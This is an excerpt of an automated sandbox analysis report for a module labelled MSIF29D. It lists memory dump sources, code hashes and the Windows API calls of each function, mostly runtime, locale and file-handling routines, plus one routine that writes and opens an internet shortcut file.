• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00FE4E3F,?,20001004,00000000,00000002,?,?,00FE4441), ref: 00FE76E3
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00FD3077), ref: 00FD3544
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: EnterCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CA3
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CE0
                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00FB2365
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: EnterCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C58
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C8B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00FD2D02
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 325507722-0
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                      • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                                                                                                                      • Instruction ID: 546c3c9dca8a9ea253c24e9d0f4226ffc41f66df49c82b12378650a9dad7e2d3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B32AD34E0025ACFCF28CF9AC991ABEB7B5EF44314F244169D945A7305DB36AE46DB80
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
• String ID:
• API String ID: 3471368781-0
                                                                                                                                                                                                                                                                      • Opcode ID: a9dd40e42dfce0975ebc977aad02b75da7af12a3826aa53b754319efc62f3dda
                                                                                                                                                                                                                                                                      • Instruction ID: 9082f40d55c254b0e28b47afe3c9727ec617ac9194218e3320038536ff6b23e0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9dd40e42dfce0975ebc977aad02b75da7af12a3826aa53b754319efc62f3dda
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FB108759007818BDB38AF26CC92BB7B3A9EF44718F14456DE94386A81F779E941E700
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                                                                                                                      • Instruction ID: 152f0bfff9864eebfdae8eda2ae698db27fe0e44c652d36d04558285fe67ede1
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5518272E0021AEFDF14CF99C941AEEBBB2EF89310F198059E905AB301C7349E50DB90
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                      • Instruction ID: 8d6ba950da5060203e5dc1ad51ad5a2c955c352f83fca87f2a846220f33badeb
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 911108B7A0118243D604C62FC4F46BBF397EBC633572D436BD0918BB58D232B945B602
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FD011D
                                                                                                                                                                                                                                                                      • collate.LIBCPMT ref: 00FD0126
                                                                                                                                                                                                                                                                        • Part of subcall function 00FCEDF2: __EH_prolog3_GS.LIBCMT ref: 00FCEDF9
                                                                                                                                                                                                                                                                        • Part of subcall function 00FCEDF2: __Getcoll.LIBCPMT ref: 00FCEE5D
                                                                                                                                                                                                                                                                      • __Getcoll.LIBCPMT ref: 00FD016C
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0180
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0195
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD01D3
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD01E6
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD022C
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0260
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD031B
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD032E
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD034B
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0368
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0385
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD02BD
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 00FD03C4
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD03D4
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0418
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB6330: LocalAlloc.KERNEL32(00000040,?,00FC0E04,00000020,?,?,00FB9942,00000000,8F6E4A30,?,?,?,?,00FF50DD,000000FF), ref: 00FB6336
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD042B
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0448
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3717464618-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00FB667E
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FB66D7
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FB66E2
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FB66FE
                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00FF49E5,000000FF), ref: 00FB67DB
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00FF49E5,000000FF), ref: 00FB67E7
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00FF49E5), ref: 00FB682F
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00FF49E5,000000FF), ref: 00FB684A
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00FF49E5), ref: 00FB6867
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00FF49E5,000000FF), ref: 00FB6891
                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00FB68D8
                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00FB692A
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00FF49E5,000000FF), ref: 00FB695C
                                                                                                                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                      • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                                                                                                                                                      • API String ID: 2199533872-3004881174
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0100DD3C,00000FA0,?,?,00FD2B6A), ref: 00FD2B98
                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00FD2B6A), ref: 00FD2BA3
                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00FD2B6A), ref: 00FD2BB4
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00FD2BC6
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00FD2BD4
                                                                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00FD2B6A), ref: 00FD2BF7
                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(0100DD3C,00000007,?,?,00FD2B6A), ref: 00FD2C13
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00FD2B6A), ref: 00FD2C23
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 00FD2BCC
                                                                                                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00FD2B9E
                                                                                                                                                                                                                                                                      • kernel32.dll, xrefs: 00FD2BAF
                                                                                                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 00FD2BC0
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                      • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                                                                      • Opcode ID: e52d9d67b21900bbea50a1801de631c1f18d2b88e6513afc6ed18b7b187254da
                                                                                                                                                                                                                                                                      • Instruction ID: 64b594ed89f5558a4bd81c822cb47b3a6b47fd759452d93a26af139372123e23
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e52d9d67b21900bbea50a1801de631c1f18d2b88e6513afc6ed18b7b187254da
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63019271A44715ABE7223FB5AC09E7A7B6D9F90760B040813B944D23A4DFB5C800F7B2
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00FD5DAC
                                                                                                                                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 00FD5DCE
                                                                                                                                                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00FD5EDD
                                                                                                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00FD5FAF
                                                                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00FD6033
                                                                                                                                                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00FD604E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                      • API String ID: 2123188842-393685449
                                                                                                                                                                                                                                                                      • Opcode ID: a4a7ac70f8908458997c2fb00cc0a96c92480dffbd1e6a81a929305c69643036
                                                                                                                                                                                                                                                                      • Instruction ID: 9d0a1ef6bf7f421c8e65edc9a1cc0d763319892deda5db622f876c27a3393fd2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4a7ac70f8908458997c2fb00cc0a96c92480dffbd1e6a81a929305c69643036
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87B18A71C00609EFCF19DFA4C8859AEBBB6FF14720B18415BE815AB302D735DA51EBA1
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,8F6E4A30,?,?,?), ref: 00FB42D2
                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,8F6E4A30,?,?,?), ref: 00FB42F3
                                                                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,8F6E4A30,?,?,?), ref: 00FB4326
                                                                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,8F6E4A30,?,?,?), ref: 00FB4337
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB4355
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB4371
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB4399
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB43B5
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB43D3
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB43EF
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1711917922-0
                                                                                                                                                                                                                                                                      • Opcode ID: cfebd93b5dc6fccff4235e96efa8a1f087bbff79b7c1f12e37a72ca91e74004c
                                                                                                                                                                                                                                                                      • Instruction ID: 99556ce95d3ca1676ac8dad900e4ae6c3fbf15702b0059994e5a2a16e6e25431
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfebd93b5dc6fccff4235e96efa8a1f087bbff79b7c1f12e37a72ca91e74004c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B515E70D01218EBDB15DF99DA84BEEFBF8BF48724F284219E510B72C0C7745905ABA8
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCBBC4
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: __EH_prolog3.LIBCMT ref: 00FC2555
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00FC255F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00FC25D0
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                                      • API String ID: 1538362411-2891247106
                                                                                                                                                                                                                                                                      • Opcode ID: 74ac6bc5fcebfb1c9b50c0b754af575ab53974c38b54275c1ba73d1c7401f7c3
                                                                                                                                                                                                                                                                      • Instruction ID: 8c353d4cef95fe407add098ce45a0714e423aac55738dc24599a01138393a9df
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74ac6bc5fcebfb1c9b50c0b754af575ab53974c38b54275c1ba73d1c7401f7c3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADB17D7A90010BAACF19DFA8CE67FFE3BA9EB04710F04411DFA06A2251D731CA10EB50
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FD0CA4
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92A0
